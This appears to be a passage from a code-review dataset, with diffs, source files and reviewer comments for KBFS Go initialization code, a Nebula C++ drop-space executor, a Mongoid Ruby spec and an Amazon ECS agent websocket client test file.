"cache operations to it.")
flags.BoolVar(¶ms.EnableJournal, "enable-journal",
defaultParams.EnableJournal, "Enables write journaling for TLFs.")
// No real need to enable setting
// params.TLFJournalBackgroundWorkStatus via a flag.
params.TLFJournalBackgroundWorkStatus =
defaultParams.TLFJournalBackgroundWorkStatus
flags.DurationVar(¶ms.BGFlushPeriod, "sync-batch-period",
defaultParams.BGFlushPeriod,
"The amount of time to wait before syncing data in a TLF, if the "+
"batch size doesn't fill up.")
flags.IntVar((*int)(¶ms.BGFlushDirOpBatchSize), "sync-batch-size",
int(defaultParams.BGFlushDirOpBatchSize),
"The number of unflushed directory operations in a TLF that will "+
"trigger an immediate data sync.")
flags.IntVar((*int)(¶ms.MetadataVersion), "md-version",
int(defaultParams.MetadataVersion),
"Metadata version to use when creating new metadata")
flags.StringVar(¶ms.Mode, "mode", defaultParams.Mode,
fmt.Sprintf("Overall initialization mode for KBFS, indicating how "+
"heavy-weight it can be (%s, %s or %s)", InitDefaultString,
InitMinimalString, InitSingleOpString))
return ¶ms
}
// AddFlags adds libkbfs flags to the given FlagSet. Returns an
// InitParams that will be filled in once the given FlagSet is parsed.
func AddFlags(flags *flag.FlagSet, ctx Context) *InitParams {
return AddFlagsWithDefaults(
flags, DefaultInitParams(ctx), defaultLogPath(ctx))
}
// GetRemoteUsageString returns a string describing the flags to use
// to run against remote KBFS servers.
func GetRemoteUsageString() string {
return ` [-debug]
[-bserver=host:port] [-mdserver=host:port]
[-log-to-file] [-log-file=path/to/file] [-clean-bcache-cap=0]`
}
// GetLocalUsageString returns a string describing the flags to use to
// run in a local testing environment.
func GetLocalUsageString() string {
return ` [-debug]
[-bserver=(memory | dir:/path/to/dir | host:port)]
[-mdserver=(memory | dir:/path/to/dir | host:port)]
[-localuser=<user>]
[-local-fav-storage=(memory | dir:/path/to/dir)]
[-log-to-file] [-log-file=path/to/file] [-clean-bcache-cap=0]`
}
// GetDefaultsUsageString returns a string describing the default
// values of flags based on the run mode.
func GetDefaultsUsageString(ctx Context) string {
runMode := ctx.GetRunMode()
defaultBServer := defaultBServer(ctx)
defaultMDServer := defaultMDServer(ctx)
return fmt.Sprintf(` (KEYBASE_RUN_MODE=%s)
-bserver=%s
-mdserver=%s`,
runMode, defaultBServer, defaultMDServer)
}
const memoryAddr = "memory"
const dirAddrPrefix = "dir:"
func parseRootDir(addr string) (string, bool) {
if !strings.HasPrefix(addr, dirAddrPrefix) {
return "", false
}
serverRootDir := addr[len(dirAddrPrefix):]
if len(serverRootDir) == 0 {
return "", false
}
return serverRootDir, true
}
func makeMDServer(config Config, mdserverAddr string,
rpcLogFactory rpc.LogFactory, log logger.Logger) (
MDServer, error) {
if mdserverAddr == memoryAddr {
log.Debug("Using in-memory mdserver")
// local in-memory MD server
return NewMDServerMemory(mdServerLocalConfigAdapter{config})
}
if len(mdserverAddr) == 0 {
return nil, errors.New("Empty MD server address")
}
if serverRootDir, ok := parseRootDir(mdserverAddr); ok {
log.Debug("Using on-disk mdserver at %s", serverRootDir)
// local persistent MD server
mdPath := filepath.Join(serverRootDir, "kbfs_md")
return NewMDServerDir(mdServerLocalConfigAdapter{config}, mdPath)
}
remote, err := rpc.ParsePrioritizedRoundRobinRemote(mdserverAddr)
if err != nil {
return nil, err
}
// remote MD server. this can't fail. reconnection attempts
// will be automatic.
log.Debug("Using remote mdserver %s", remote)
mdServer := NewMDServerRemote(config, remote, rpcLogFactory)
return mdServer, nil
}
func makeKeyServer(config Config, keyserverAddr string,
log logger.Logger) (KeyServer, error) {
if keyserverAddr == memoryAddr {
log.Debug("Using in-memory keyserver")
// local in-memory key server
return NewKeyServerMemory(config)
}
if len(keyserverAddr) == 0 {
return nil, errors.New("Empty key server address")
}
if serverRootDir, ok := parseRootDir(keyserverAddr); ok {
log.Debug("Using on-disk keyserver at %s", serverRootDir)
// local persistent key server
keyPath := filepath.Join(serverRootDir, "kbfs_key")
return NewKeyServerDir(config, keyPath)
}
log.Debug("Using remote keyserver %s (same as mdserver)", keyserverAddr)
// currently the MD server also acts as the key server.
keyServer, ok := config.MDServer().(KeyServer)
if !ok {
return nil, errors.New("MD server is not a key server")
}
return keyServer, nil
}
func makeBlockServer(config Config, bserverAddr string,
rpcLogFactory rpc.LogFactory,
log logger.Logger) (BlockServer, error) {
if bserverAddr == memoryAddr {
log.Debug("Using in-memory bserver")
bserverLog := config.MakeLogger("BSM")
// local in-memory block server
return NewBlockServerMemory(bserverLog), nil
}
if len(bserverAddr) == 0 {
return nil, errors.New("Empty block server address")
}
if serverRootDir, ok := parseRootDir(bserverAddr); ok {
log.Debug("Using on-disk bserver at %s", serverRootDir)
// local persistent block server
blockPath := filepath.Join(serverRootDir, "kbfs_block")
bserverLog := config.MakeLogger("BSD")
return NewBlockServerDir(config.Codec(),
bserverLog, blockPath), nil
}
remote, err := rpc.ParsePrioritizedRoundRobinRemote(bserverAddr)
if err != nil {
return nil, err
}
log.Debug("Using remote bserver %s", remote)
return NewBlockServerRemote(config, remote, rpcLogFactory), nil
}
// InitLogWithPrefix sets up logging switching to a log file if
// necessary, given a prefix and a default log path. Returns a valid
// logger even on error, which are non-fatal, thus errors from this
// function may be ignored. Possible errors are logged to the logger
// returned.
func InitLogWithPrefix(
params InitParams, ctx Context, prefix string,
defaultLogPath string) (logger.Logger, error) {
var err error
// Set log file to default if log-to-file was specified
if params.LogToFile {
if params.LogFileConfig.Path != "" {
return nil, fmt.Errorf(
"log-to-file and log-file flags can't be specified together")
}
params.LogFileConfig.Path = defaultLogPath
}
if params.LogFileConfig.Path != "" {
err = logger.SetLogFileConfig(¶ms.LogFileConfig)
}
log := logger.NewWithCallDepth(prefix, 1)
log.Configure("", params.Debug, "")
log.Info("KBFS version %s", VersionString())
if err != nil {
log.Warning("Failed to setup log file %q: %+v",
params.LogFileConfig.Path, err)
}
return log, err
}
// InitLog sets up logging switching to a log file if necessary.
// Returns a valid logger even on error, which are non-fatal, thus
// errors from this function may be ignored.
// Possible errors are logged to the logger returned.
func InitLog(params InitParams, ctx Context) (logger.Logger, error) {
return InitLogWithPrefix(params, ctx, "kbfs", defaultLogPath(ctx))
}
// InitWithLogPrefix initializes a config and returns it, given a prefix.
//
// onInterruptFn is called whenever an interrupt signal is received
// (e.g., if the user hits Ctrl-C).
//
// Init should be called at the beginning of main. Shutdown (see
// below) should then be called at the end of main (usually via
// defer).
//
// The keybaseServiceCn argument is to specify a custom service and
// crypto (for non-RPC environments) like mobile. If this is nil, we'll
// use the default RPC implementation.
func InitWithLogPrefix(
ctx context.Context, kbCtx Context, params InitParams,
keybaseServiceCn KeybaseServiceCn, onInterruptFn func(),
log logger.Logger, logPrefix string) (cfg Config, err error) {
done := make(chan struct{})
interruptChan := make(chan os.Signal, 1)
signal.Notify(interruptChan, os.Interrupt)
go func() {
_ = <-interruptChan
close(done)
if onInterruptFn != nil {
onInterruptFn()
// Unmount can fail if there are open file handles. In
// this case, the files need to be closed before calling
// unmount again. We keep listening on the signal channel
// in case unmount fails the first time, so user can press
// Ctrl-C again after closing open files.
//
// Not closing the channel here because we need to keep it
// open to handle further incoming signals. We don't
// explicitly call os.Exit here so that the process exits
// through normal workflow as a result of Ctrl-C. If the
// process needs to exit immediately no matter unmount
// succeeds or not, a different interrupt (e.g. SIGTERM)
// can be used to skip this.
for range interruptChan {
onInterruptFn()
}
}
}()
// Spawn a new goroutine for `doInit` so that we can `select` on
// `done` and `errCh` below. This is particularly for the
// situation where a SIGINT comes in while `doInit` is still not
// finished (because e.g. service daemon is not up), where the
// process can fail to exit while being stuck in `doInit`. This
// allows us to not call `os.Exit()` in the interrupt handler.
errCh := make(chan error)
go func() {
var er error
cfg, er = doInit(ctx, kbCtx, params, keybaseServiceCn, log, logPrefix)
errCh <- er
}()
select {
case <-done:
return nil, errors.New(os.Interrupt.String())
case err = <-errCh:
return cfg, err
}
}
// Init initializes a config and returns it.
//
// onInterruptFn is called whenever an interrupt signal is received
// (e.g., if the user hits Ctrl-C).
//
// Init should be called at the beginning of main. Shutdown (see
// below) should then be called at the end of main (usually via
// defer).
//
// The keybaseServiceCn argument is to specify a custom service and
// crypto (for non-RPC environments) like mobile. If this is nil, we'll
// use the default RPC implementation.
func Init(
ctx context.Context, kbCtx Context, params InitParams,
keybaseServiceCn KeybaseServiceCn, onInterruptFn func(),
log logger.Logger) (cfg Config, err error) {
return InitWithLogPrefix(
ctx, kbCtx, params, keybaseServiceCn, onInterruptFn, log, "kbfs")
}
func doInit(
ctx context.Context, kbCtx Context, params InitParams,
keybaseServiceCn KeybaseServiceCn, log logger.Logger,
logPrefix string) (Config, error) {
mode := InitDefault
switch params.Mode {
case InitDefaultString:
log.CDebugf(ctx, "Initializing in default mode")
// Already the default
case InitMinimalString:
log.CDebugf(ctx, "Initializing in minimal mode")
mode = InitMinimal
case InitSingleOpString:
log.CDebugf(ctx, "Initializing in singleOp mode")
mode = InitSingleOp
default:
return nil, fmt.Errorf("Unexpected mode: %s", params.Mode)
}
config := NewConfigLocal(mode, func(module string) logger.Logger {
mname := logPrefix
if module != "" {
mname += fmt.Sprintf("(%s)", module)
}
// Add log depth so that context-based messages get the right
// file printed out.
lg := logger.NewWithCallDepth(mname, 1)
if params.Debug {
// Turn on debugging. TODO: allow a proper log file and
// style to be specified.
lg.Configure("", true, "")
}
return lg
}, params.StorageRoot, params.DiskCacheMode, kbCtx)
if params.CleanBlockCacheCapacity > 0 {
log.CDebugf(
ctx, "overriding default clean block cache capacity from %d to %d",
config.BlockCache().GetCleanBytesCapacity(),
params.CleanBlockCacheCapacity)
config.BlockCache().SetCleanBytesCapacity(
params.CleanBlockCacheCapacity)
}
workers := defaultBlockRetrievalWorkerQueueSize
prefetchWorkers := defaultPrefetchWorkerQueueSize
if config.Mode() == InitMinimal {
// In minimal mode, a few workers are still needed to fetch
// unembedded block changes in the MD updates, but not many.
// TODO: turn off the block retriever entirely as part of
// KBFS-2026, when block re-embedding is no longer required.
workers = minimalBlockRetrievalWorkerQueueSize
prefetchWorkers = minimalPrefetchWorkerQueueSize
}
config.SetBlockOps(NewBlockOpsStandard(config, workers, prefetchWorkers))
bsplitter, err := NewBlockSplitterSimple(MaxBlockSizeBytesDefault, 8*1024,
config.Codec())
if err != nil {
return nil, err
}
config.SetBlockSplitter(bsplitter)
if registry := config.MetricsRegistry(); registry != nil {
keyCache := config.KeyCache()
keyCache = NewKeyCacheMeasured(keyCache, registry)
config.SetKeyCache(keyCache)
keyBundleCache := config.KeyBundleCache()
keyBundleCache = NewKeyBundleCacheMeasured(keyBundleCache, registry)
config.SetKeyBundleCache(keyBundleCache)
}
config.SetMetadataVersion(kbfsmd.MetadataVer(params.MetadataVersion))
config.SetTLFValidDuration(params.TLFValidDuration)
config.SetBGFlushPeriod(params.BGFlushPeriod)
kbfsOps := NewKBFSOpsStandard(config)
config.SetKBFSOps(kbfsOps)
config.SetNotifier(kbfsOps)
config.SetKeyManager(NewKeyManagerStandard(config))
config.SetMDOps(NewMDOpsStandard(config))
kbfsLog := config.MakeLogger("")
// Initialize Keybase service connection
if keybaseServiceCn == nil {
keybaseServiceCn = keybaseDaemon{}
}
service, err := keybaseServiceCn.NewKeybaseService(
config, params, kbCtx, kbfsLog)
if err != nil {
return nil, fmt.Errorf("problem creating service: %s", err)
}
if registry := config.MetricsRegistry(); registry != nil {
service = NewKeybaseServiceMeasured(service, registry)
}
config.SetKeybaseService(service)
// Initialize KBPKI client (needed for MD Server).
k := NewKBPKIClient(config, kbfsLog)
config.SetKBPKI(k)
config.SetReporter(NewReporterKBPKI(config, 10, 1000))
// Initialize Crypto client (needed for MD and Block servers).
crypto, err := keybaseServiceCn.NewCrypto(config, params, kbCtx, kbfsLog)
if err != nil {
return nil, fmt.Errorf("problem creating crypto: %s", err)
}
config.SetCrypto(crypto)
// Initialize MDServer connection.
mdServer, err := makeMDServer(
config, params.MDServerAddr, kbCtx.NewRPCLogFactory(), log)
if err != nil {
return nil, fmt.Errorf("problem creating MD server: %+v", err)
}
config.SetMDServer(mdServer)
// Initialize KeyServer connection. MDServer is the KeyServer at the
// moment.
keyServer, err := makeKeyServer(config, params.MDServerAddr, log)
if err != nil {
return nil, fmt.Errorf("problem creating key server: %+v", err)
}
if registry := config.MetricsRegistry(); registry != nil {
keyServer = NewKeyServerMeasured(keyServer, registry)
}
config.SetKeyServer(keyServer)
// Initialize BlockServer connection.
bserv, err := makeBlockServer(
config, params.BServerAddr, kbCtx.NewRPCLogFactory(), log)
if err != nil {
return nil, fmt.Errorf("cannot open block database: %+v", err)
}
if registry := config.MetricsRegistry(); registry != nil {
bserv = NewBlockServerMeasured(bserv, registry)
}
config.SetBlockServer(bserv)
err = config.MakeDiskBlockCacheIfNotExists()
if err != nil {
log.CWarningf(ctx, "Could not initialize disk cache: %+v", err)
notification := &keybase1.FSNotification{
StatusCode: keybase1.FSStatusCode_ERROR,
NotificationType: keybase1.FSNotificationType_INITIALIZED,
ErrorType: keybase1.FSErrorType_DISK_CACHE_ERROR_LOG_SEND,
}
defer config.Reporter().Notify(ctx, notification)
} else {
log.CDebugf(ctx, "Disk cache of type \"%s\" enabled",
params.DiskCacheMode.String())
}
if config.Mode() == InitDefault {
// Initialize kbfsService only when we run a full KBFS process.
// This requires the disk block cache to have been initialized, if it
// should be initialized.
kbfsService, err := NewKBFSService(kbCtx, config)
if err != nil {
// This error shouldn't be fatal
log.CWarningf(ctx, "Error starting RPC server for KBFS: %+v", err)
} else {
config.SetKBFSService(kbfsService)
log.CDebugf(ctx, "Started RPC server for KBFS")
}
}
err = config.EnableDiskLimiter(params.StorageRoot)
if err != nil {
log.CWarningf(ctx, "Could not enable disk limiter: %+v", err)
return nil, err
}
ctx10s, cancel := context.WithTimeout(ctx, 10*time.Second)
defer cancel()
// TODO: Don't turn on journaling if either -bserver or
// -mdserver point to local implementations.
if params.EnableJournal && config.Mode() != InitMinimal {
journalRoot := filepath.Join(params.StorageRoot, "kbfs_journal")
err = config.EnableJournaling(ctx10s, journalRoot,
params.TLFJournalBackgroundWorkStatus)
if err != nil {
log.CWarningf(ctx, "Could not initialize journal server: %+v", err)
}
log.CDebugf(ctx, "Journaling enabled")
}
if params.BGFlushDirOpBatchSize < 1 {
return nil, fmt.Errorf(
"Illegal sync batch size: %d", params.BGFlushDirOpBatchSize)
}
log.CDebugf(ctx, "Enabling a dir op batch size of %d",
params.BGFlushDirOpBatchSize)
config.SetBGFlushDirOpBatchSize(params.BGFlushDirOpBatchSize)
return config, nil
}
// Shutdown does any necessary shutdown tasks for libkbfs. Shutdown
// should be called at the end of main.
func Shutdown() {}
| 1 | 18,499 | Would a KBFS_DISABLE_JOURNAL make more sense? | keybase-kbfs | go |
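A minimal sketch of the alternative the comment suggests, assuming a `KBFS_DISABLE_JOURNAL` variable so journaling stays on by default and is only turned off when explicitly requested; the variable name is the reviewer's suggestion, not an existing KBFS flag.

```go
package main

import (
	"fmt"
	"os"
	"strconv"
)

// journalEnabled defaults to true; only an explicit truthy
// KBFS_DISABLE_JOURNAL turns journaling off. The env var name is
// hypothetical (the reviewer's suggestion), not an existing KBFS flag.
func journalEnabled() bool {
	v := os.Getenv("KBFS_DISABLE_JOURNAL")
	if v == "" {
		return true
	}
	disabled, err := strconv.ParseBool(v)
	if err != nil {
		return true // unparseable values keep the default
	}
	return !disabled
}

func main() {
	fmt.Println("EnableJournal:", journalEnabled())
}
```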
@@ -40,6 +40,8 @@ void DropSpaceExecutor::execute() {
if (*spaceName_ == ectx()->rctx()->session()->spaceName()) {
ectx()->rctx()->session()->setSpace("", -1);
}
+ ectx()->addWarningMsg("Data will be deleted completely after restarting the services");
+
doFinish(Executor::ProcessControl::kNext);
};
| 1 | /* Copyright (c) 2018 vesoft inc. All rights reserved.
*
* This source code is licensed under Apache 2.0 License,
* attached with Common Clause Condition 1.0, found in the LICENSES directory.
*/
#include "graph/DropSpaceExecutor.h"
namespace nebula {
namespace graph {
DropSpaceExecutor::DropSpaceExecutor(Sentence *sentence,
ExecutionContext *ectx)
: Executor(ectx, "drop_space") {
sentence_ = static_cast<DropSpaceSentence*>(sentence);
}
Status DropSpaceExecutor::prepare() {
spaceName_ = sentence_->spaceName();
return Status::OK();
}
void DropSpaceExecutor::execute() {
auto future = ectx()->getMetaClient()->dropSpace(*spaceName_, sentence_->isIfExists());
auto *runner = ectx()->rctx()->runner();
auto cb = [this] (auto &&resp) {
if (!resp.ok()) {
doError(std::move(resp).status());
return;
}
auto ret = std::move(resp).value();
if (!ret) {
doError(Status::Error("Drop space `%s' failed.", spaceName_->c_str()));
return;
}
if (*spaceName_ == ectx()->rctx()->session()->spaceName()) {
ectx()->rctx()->session()->setSpace("", -1);
}
doFinish(Executor::ProcessControl::kNext);
};
auto error = [this] (auto &&e) {
auto msg = folly::stringPrintf("Drop space `%s' exception: %s",
spaceName_->c_str(), e.what().c_str());
LOG(ERROR) << msg;
doError(Status::Error(std::move(msg)));
return;
};
std::move(future).via(runner).thenValue(cb).thenError(error);
}
void DropSpaceExecutor::setupResponse(cpp2::ExecutionResponse &resp) {
resp.set_warning_msg("Data will be deleted completely after restarting the services.");
}
} // namespace graph
} // namespace nebula
| 1 | 29,850 | BTW, what does the message mean?... | vesoft-inc-nebula | cpp
@@ -289,4 +289,15 @@ describe Mongoid::Extensions::Object do
end
end
end
+
+ describe "#numeric?" do
+
+ let(:object) do
+ Object.new
+ end
+
+ it "returns false" do
+ expect(object.numeric?).to eq(false)
+ end
+ end
end | 1 | require "spec_helper"
describe Mongoid::Extensions::Object do
describe "#__evolve_object_id__" do
let(:object) do
Object.new
end
it "returns self" do
expect(object.__evolve_object_id__).to eq(object)
end
end
describe "#__find_args__" do
let(:object) do
Object.new
end
it "returns self" do
expect(object.__find_args__).to eq(object)
end
end
describe "#__mongoize_object_id__" do
let(:object) do
Object.new
end
it "returns self" do
expect(object.__mongoize_object_id__).to eq(object)
end
end
describe ".__mongoize_fk__" do
context "when the related model uses object ids" do
let(:metadata) do
Game.relations["person"]
end
let(:constraint) do
metadata.constraint
end
context "when provided an object id" do
let(:object_id) do
BSON::ObjectId.new
end
let(:fk) do
Object.__mongoize_fk__(constraint, object_id)
end
it "returns the object id" do
expect(fk).to eq(object_id)
end
end
context "when provided a string" do
context "when the string is a legal object id" do
let(:object_id) do
BSON::ObjectId.new
end
let(:fk) do
Object.__mongoize_fk__(constraint, object_id.to_s)
end
it "returns the object id" do
expect(fk).to eq(object_id)
end
end
context "when the string is not a legal object id" do
let(:string) do
"blah"
end
let(:fk) do
Object.__mongoize_fk__(constraint, string)
end
it "returns the string" do
expect(fk).to eq(string)
end
end
context "when the string is blank" do
let(:fk) do
Object.__mongoize_fk__(constraint, "")
end
it "returns nil" do
expect(fk).to be_nil
end
end
end
context "when provided nil" do
let(:fk) do
Object.__mongoize_fk__(constraint, nil)
end
it "returns nil" do
expect(fk).to be_nil
end
end
context "when provided an empty array" do
let(:fk) do
Object.__mongoize_fk__(constraint, [])
end
it "returns an empty array" do
expect(fk).to eq([])
end
end
end
end
describe "#__mongoize_time__" do
let(:object) do
Object.new
end
it "returns self" do
expect(object.__mongoize_time__).to eq(object)
end
end
describe "#__sortable__" do
let(:object) do
Object.new
end
it "returns self" do
expect(object.__sortable__).to eq(object)
end
end
describe ".demongoize" do
let(:object) do
"testing"
end
it "returns the provided object" do
expect(Object.demongoize(object)).to eq(object)
end
end
describe "#do_or_do_not" do
context "when the object is nil" do
let(:result) do
nil.do_or_do_not(:not_a_method, "The force is strong with you")
end
it "returns nil" do
expect(result).to be_nil
end
end
context "when the object is not nil" do
context "when the object responds to the method" do
let(:result) do
[ "Yoda", "Luke" ].do_or_do_not(:join, ",")
end
it "returns the result of the method" do
expect(result).to eq("Yoda,Luke")
end
end
context "when the object does not respond to the method" do
let(:result) do
"Yoda".do_or_do_not(:use, "The Force", 1000)
end
it "returns the result of the method" do
expect(result).to be_nil
end
end
end
end
describe ".mongoize" do
let(:object) do
"testing"
end
it "returns the provided object" do
expect(Object.mongoize(object)).to eq(object)
end
end
describe "#mongoize" do
let(:object) do
"testing"
end
it "returns the object" do
expect(object.mongoize).to eq(object)
end
end
describe "#resizable?" do
it "returns false" do
expect(Object.new).to_not be_resizable
end
end
describe "#you_must" do
context "when the object is frozen" do
let(:person) do
Person.new.tap { |peep| peep.freeze }
end
let(:result) do
person.you_must(:aliases=, [])
end
it "returns nil" do
expect(result).to be_nil
end
end
end
describe "#remove_ivar" do
context "when the instance variable is defined" do
let(:document) do
Person.new
end
before do
document.instance_variable_set(:@_testing, "testing")
end
let!(:removal) do
document.remove_ivar("testing")
end
it "removes the instance variable" do
expect(document.instance_variable_defined?(:@_testing)).to be false
end
it "returns the value" do
expect(removal).to eq("testing")
end
end
context "when the instance variable is not defined" do
let(:document) do
Person.new
end
let!(:removal) do
document.remove_ivar("testing")
end
it "returns false" do
expect(removal).to be false
end
end
end
end
| 1 | 11,163 | this should say false | mongodb-mongoid | rb |
@@ -1,3 +1,4 @@
+//go:build unit
// +build unit
// Copyright Amazon.com Inc. or its affiliates. All Rights Reserved. | 1 | // +build unit
// Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License"). You may
// not use this file except in compliance with the License. A copy of the
// License is located at
//
// http://aws.amazon.com/apache2.0/
//
// or in the "license" file accompanying this file. This file is distributed
// on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
// express or implied. See the License for the specific language governing
// permissions and limitations under the License.
package acsclient
import (
"encoding/json"
"errors"
"io"
"net/http"
"net/http/httptest"
"testing"
"time"
"github.com/aws/amazon-ecs-agent/agent/acs/model/ecsacs"
"github.com/aws/amazon-ecs-agent/agent/config"
"github.com/aws/amazon-ecs-agent/agent/wsclient"
mock_wsconn "github.com/aws/amazon-ecs-agent/agent/wsclient/wsconn/mock"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/credentials"
"github.com/golang/mock/gomock"
"github.com/gorilla/websocket"
"github.com/stretchr/testify/assert"
)
const (
sampleCredentialsMessage = `
{
"type": "IAMRoleCredentialsMessage",
"message": {
"messageId": "123",
"clusterArn": "default",
"taskArn": "t1",
"roleCredentials": {
"credentialsId": "credsId",
"accessKeyId": "accessKeyId",
"expiration": "2016-03-25T06:17:19.318+0000",
"roleArn": "roleArn",
"secretAccessKey": "secretAccessKey",
"sessionToken": "token"
}
}
}
`
sampleAttachENIMessage = `
{
"type": "AttachTaskNetworkInterfacesMessage",
"message": {
"messageId": "123",
"clusterArn": "default",
"taskArn": "task",
"elasticNetworkInterfaces":[{
"attachmentArn": "attach_arn",
"ec2Id": "eni_id",
"ipv4Addresses":[{
"primary": true,
"privateAddress": "ipv4"
}],
"ipv6Addresses":[{
"address": "ipv6"
}],
"macAddress": "mac"
}]
}
}
`
sampleAttachInstanceENIMessage = `
{
"type": "AttachInstanceNetworkInterfacesMessage",
"message": {
"messageId": "123",
"clusterArn": "default",
"elasticNetworkInterfaces":[{
"attachmentArn": "attach_arn",
"ec2Id": "eni_id",
"ipv4Addresses":[{
"primary": true,
"privateAddress": "ipv4"
}],
"ipv6Addresses":[{
"address": "ipv6"
}],
"macAddress": "mac"
}]
}
}
`
)
const (
TestClusterArn = "arn:aws:ec2:123:container/cluster:123456"
TestInstanceArn = "arn:aws:ec2:123:container/containerInstance/12345678"
rwTimeout = time.Second
)
var testCreds = credentials.NewStaticCredentials("test-id", "test-secret", "test-token")
var testCfg = &config.Config{
AcceptInsecureCert: true,
AWSRegion: "us-east-1",
}
func TestMakeUnrecognizedRequest(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil)
conn.EXPECT().Close()
cs := testCS(conn)
defer cs.Close()
// 'testing.T' should not be a known type ;)
err := cs.MakeRequest(t)
if _, ok := err.(*wsclient.UnrecognizedWSRequestType); !ok {
t.Fatal("Expected unrecognized request type")
}
}
func TestWriteAckRequest(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil).Times(2)
conn.EXPECT().Close()
cs := testCS(conn)
defer cs.Close()
// capture bytes written
var writes []byte
conn.EXPECT().WriteMessage(gomock.Any(), gomock.Any()).Do(func(_ int, data []byte) {
writes = data
})
// send request
err := cs.MakeRequest(&ecsacs.AckRequest{})
assert.NoError(t, err)
// unmarshal bytes written to the socket
msg := &wsclient.RequestMessage{}
err = json.Unmarshal(writes, msg)
assert.NoError(t, err)
assert.Equal(t, "AckRequest", msg.Type)
}
func TestPayloadHandlerCalled(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
// Messages should be read from the connection at least once
conn.EXPECT().SetReadDeadline(gomock.Any()).Return(nil).MinTimes(1)
conn.EXPECT().ReadMessage().Return(websocket.TextMessage,
[]byte(`{"type":"PayloadMessage","message":{"tasks":[{"arn":"arn"}]}}`),
nil).MinTimes(1)
// Invoked when closing the connection
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil)
conn.EXPECT().Close()
cs := testCS(conn)
defer cs.Close()
messageChannel := make(chan *ecsacs.PayloadMessage)
reqHandler := func(payload *ecsacs.PayloadMessage) {
messageChannel <- payload
}
cs.AddRequestHandler(reqHandler)
go cs.Serve()
expectedMessage := &ecsacs.PayloadMessage{
Tasks: []*ecsacs.Task{{
Arn: aws.String("arn"),
}},
}
assert.Equal(t, expectedMessage, <-messageChannel)
}
func TestRefreshCredentialsHandlerCalled(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
// Messages should be read from the connection at least once
conn.EXPECT().SetReadDeadline(gomock.Any()).Return(nil).MinTimes(1)
conn.EXPECT().ReadMessage().Return(websocket.TextMessage,
[]byte(sampleCredentialsMessage), nil).MinTimes(1)
// Invoked when closing the connection
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil)
conn.EXPECT().Close()
cs := testCS(conn)
defer cs.Close()
messageChannel := make(chan *ecsacs.IAMRoleCredentialsMessage)
reqHandler := func(message *ecsacs.IAMRoleCredentialsMessage) {
messageChannel <- message
}
cs.AddRequestHandler(reqHandler)
go cs.Serve()
expectedMessage := &ecsacs.IAMRoleCredentialsMessage{
MessageId: aws.String("123"),
TaskArn: aws.String("t1"),
RoleCredentials: &ecsacs.IAMRoleCredentials{
CredentialsId: aws.String("credsId"),
AccessKeyId: aws.String("accessKeyId"),
Expiration: aws.String("2016-03-25T06:17:19.318+0000"),
RoleArn: aws.String("roleArn"),
SecretAccessKey: aws.String("secretAccessKey"),
SessionToken: aws.String("token"),
},
}
assert.Equal(t, <-messageChannel, expectedMessage)
}
func TestClosingConnection(t *testing.T) {
ctrl := gomock.NewController(t)
defer ctrl.Finish()
// Returning EOF tells the ClientServer that the connection is closed
conn := mock_wsconn.NewMockWebsocketConn(ctrl)
conn.EXPECT().SetReadDeadline(gomock.Any()).Return(nil)
conn.EXPECT().ReadMessage().Return(0, nil, io.EOF)
// SetWriteDeadline will be invoked once for WriteMessage() and
// once for Close()
conn.EXPECT().SetWriteDeadline(gomock.Any()).Return(nil).Times(2)
conn.EXPECT().WriteMessage(gomock.Any(), gomock.Any()).Return(io.EOF)
conn.EXPECT().Close()
cs := testCS(conn)
defer cs.Close()
serveErr := cs.Serve()
assert.Error(t, serveErr)
err := cs.MakeRequest(&ecsacs.AckRequest{})
assert.Error(t, err)
}
func TestConnect(t *testing.T) {
closeWS := make(chan bool)
server, serverChan, requestChan, serverErr, err := startMockAcsServer(t, closeWS)
defer server.Close()
if err != nil {
t.Fatal(err)
}
go func() {
t.Fatal(<-serverErr)
}()
cs := New(server.URL, testCfg, testCreds, rwTimeout)
// Wait for up to a second for the mock server to launch
for i := 0; i < 100; i++ {
err = cs.Connect()
if err == nil {
break
}
time.Sleep(10 * time.Millisecond)
}
if err != nil {
t.Fatal(err)
}
errs := make(chan error)
cs.AddRequestHandler(func(msg *ecsacs.PayloadMessage) {
if *msg.MessageId != "messageId" || len(msg.Tasks) != 1 || *msg.Tasks[0].Arn != "arn1" {
errs <- errors.New("incorrect payloadMessage arguments")
} else {
errs <- nil
}
})
go func() {
_ = cs.Serve()
}()
go func() {
serverChan <- `{"type":"PayloadMessage","message":{"tasks":[{"arn":"arn1","desiredStatus":"RUNNING","overrides":"{}","family":"test","version":"v1","containers":[{"name":"c1","image":"redis","command":["arg1","arg2"],"cpu":10,"memory":20,"links":["db"],"portMappings":[{"containerPort":22,"hostPort":22}],"essential":true,"entryPoint":["bash"],"environment":{"key":"val"},"overrides":"{}","desiredStatus":"RUNNING"}]}],"messageId":"messageId"}}` + "\n"
}()
// Error for handling a 'PayloadMessage' request
err = <-errs
if err != nil {
t.Fatal(err)
}
mid := "messageId"
cluster := TestClusterArn
ci := TestInstanceArn
go func() {
cs.MakeRequest(&ecsacs.AckRequest{
MessageId: &mid,
Cluster: &cluster,
ContainerInstance: &ci,
})
}()
request := <-requestChan
// A request should have a 'type' and a 'message'
intermediate := struct {
Type string `json:"type"`
Message *ecsacs.AckRequest `json:"message"`
}{}
err = json.Unmarshal([]byte(request), &intermediate)
if err != nil {
t.Fatal(err)
}
if intermediate.Type != "AckRequest" || *intermediate.Message.MessageId != mid || *intermediate.Message.ContainerInstance != ci || *intermediate.Message.Cluster != cluster {
t.Fatal("Unexpected request")
}
closeWS <- true
close(serverChan)
}
func TestConnectClientError(t *testing.T) {
